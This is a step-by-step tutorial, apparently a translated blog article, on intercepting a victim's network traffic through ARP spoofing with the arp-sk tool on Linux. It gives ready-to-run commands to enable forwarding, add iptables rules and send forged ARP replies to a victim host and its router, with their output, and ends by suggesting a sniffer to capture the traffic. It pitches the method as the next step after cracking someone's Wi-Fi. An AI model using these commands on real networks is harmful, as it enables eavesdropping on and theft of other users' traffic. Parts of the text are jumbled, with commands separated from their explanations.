Practice using arp-spoofing

    In this article I will tell you how to use the arp-sk utility package in the GNU / Linux operating system to implement a man-in-the-middle attack on the arp protocol.
    image

    Why do we need such an attack:
    There are a lot of articles on the hub - for example, to crack Wi-Fi. But what to do after the key is cracked? Here you can see one of the options.

    Bit of theory


    The arp protocol is required for transmission in an Ethernet environment. Because the transfer is carried out by mac-addresses. Read more about the mac address on Wikipedia.
    en.wikipedia.org/wiki/MAC-%D0%B0%D0%B4%D1%80%D0%B5%D1%81
    In order for a message to be transferred from one network device to another, in particular from Victim to Router the computer needs to map IP address to mac address. Consider this process with the tcpdump utility
    # tcpdump -i eth1 -vvv
    21:11:14.076068 ARP, Ethernet (len 6), IPv4 (len 4), Request who-has 192.168.4.1 tell 192.168.4.17, length 28
    21:11:14.077852 ARP, Ethernet (len 6), IPv4 (len 4), Reply 192.168.4.1 is-at 00:50:ba:46:5d:92 (oui Unknown), length 46


    the first packet - the computer sends a broadcast message in order to find out the mac address that belongs to the IP address 192.168.4.1 and a request to send a response to 192.168.4.11. It is not visible here, but the computer 192.168.4.11, when sending this request, indicates its mac address as the source and the broadcast mac address (FF: FF: FF: FF: FF: FF) as the recipient address. Having received this packet, the network device should compare the ip-address with its own, and in case of coincidence, send the next packet.
    the second packet - the device with the address 192.168.4.1 responds to the mac address that was specified in the request from its mac address, that the address 192.168.4.1 is at 00: 50: ba: 46: 5d: 92.

    Due to the fact that the arp request is sent to the broadcast address, this message can be received by anyone who is in the same broadcast segment with the source. Therefore, one of the attack options arises - to constantly send a message about your mac address. At the same time, when the victim computer sends an arp request to the router, it immediately receives a response from the attacker. Accordingly, traffic will be sent to the attacker.

    Our task: to get the Victim computer traffic using the Attacker computer.
    For this we will use a spontaneous arp response. The arp protocol provides for the device to send an arp request or response if other devices do not require it. What is this for - for example, if the mac address of the router has changed. If the computer supports spontaneous arp, then it will rewrite the legitimate address to the address of the attacker.

    Conducting an attack


    Installing the necessary software

    Arp-sk: If the package is successfully compiled, install it. You can see the options for running the command using the following keys:
    # wget sid.rstack.org/arp-sk/files/arp-sk-0.0.16.tgz
    # tar xvzf arp-sk-0.0.16.tgz
    # cd arp-sk-0.0.16/
    # ./configure
    # make


    # make install

    # arp-sk --help

    Usage: arp-sk
    -r --reply отправлять ARP ответ

    -d --dst получатель в link layer ()
    -s --src источник в link layer ()

    -D --arp-dst получатель в ARP сообщении ([hostname|hostip][:MAC])
    -S --arp-src источник в ARP сообщении ([hostname|hostip][:MAC])

    -i --interface указать интерфейс (eth0)


    Address spoofing

    We must send to the router and the computer arp messages that the mac address of the other device is ours.
    before that, we will configure the Attacker computer to redirect traffic. To do this, enable traffic redirection in the kernel:
    # echo 1 > /proc/sys/net/ipv4/ip_forward
    Now enable traffic redirection in the packet filter. I use iptables, so I am adding enabling policies to the FORWARD chain. Since my network is using a test network for attack, I can add the following rules: These 2 rules allow traffic redirection by the attacking computer for the address 192.168.4.17. Attention! These rules are potentially dangerous, especially if you have several network interfaces. In this case, I recommend using more precise rules. Let's see the addresses Our address:
    # iptables -I FORWARD 1 -s 192.168.4.17 -j ACCEPT
    # iptables -I FORWARD 2 -d 192.168.4.17 -j ACCEPT






    # ifconfig eth1 | grep HW
    eth1 Link encap:Ethernet HWaddr 00:13:CE:5C:11:34


    Addresses of other devices Let's look at the routing table of the Victim computer: Now we send the following arp packets to the devices: we substitute our own as the mac address of another device. The first on behalf of 192.168.4.17 that its mac address is now 00: 13: CE: 5C: 11: 34 we send to 192.168.4.1 (00: 50: ba: 46: 5d: 92); the second on behalf of 192.168.4.1 that his mac address is now 00: 13: CE: 5C: 11: 34 we are sending to 192.168.4.17 (00: 1c: bf: 41: 53: 4b) We will have the following output: Now let's look at Victim arp -table: Actually everything. Now you can run your favorite sniffer and get the necessary packages. For example ping before Yandex . Addition. If a firewall is installed on the computer, it may display a message about spoofing.
    # arp -an
    ? (192.168.4.1) at 00:50:ba:46:5d:92 [ether] on eth1
    ? (192.168.4.17) at 00:1c:bf:41:53:4b [ether] on eth1


    image





    # arp-sk -i eth1 -r -s 00:13:CE:5C:11:34 -S 192.168.4.17 -d 00:50:ba:46:5d:92 -D 192.168.4.1
    # arp-sk -i eth1 -r -s 00:13:CE:5C:11:34 -S 192.168.4.1 -d 00:1c:bf:41:53:4b -D 192.168.4.17



    + Initialization of the packet structure
    + Running mode "reply"
    + Ifname: eth1
    + Source MAC: 00:13:ce:5c:11:34
    + Source ARP MAC: 00:13:ce:5c:11:34
    + Source ARP IP : 192.168.4.1
    + Target MAC: 00:1c:bf:41:53:4b
    + Target ARP MAC: 00:1c:bf:41:53:4b
    + Target ARP IP : 192.168.4.17

    --- Start classical sending ---
    TS: 21:30:44.338540
    To: 00:1c:bf:41:53:4b From: 00:13:ce:5c:11:34 0x0806
    ARP For 192.168.4.17 (00:1c:bf:41:53:4b):
    192.168.4.1 is at 00:13:ce:5c:11:34



    image


    image



    This information is for reference only. The author reminds you of Article 272 of the Criminal Code of the Russian Federation “Unlawful access to computer information”

    Also popular now: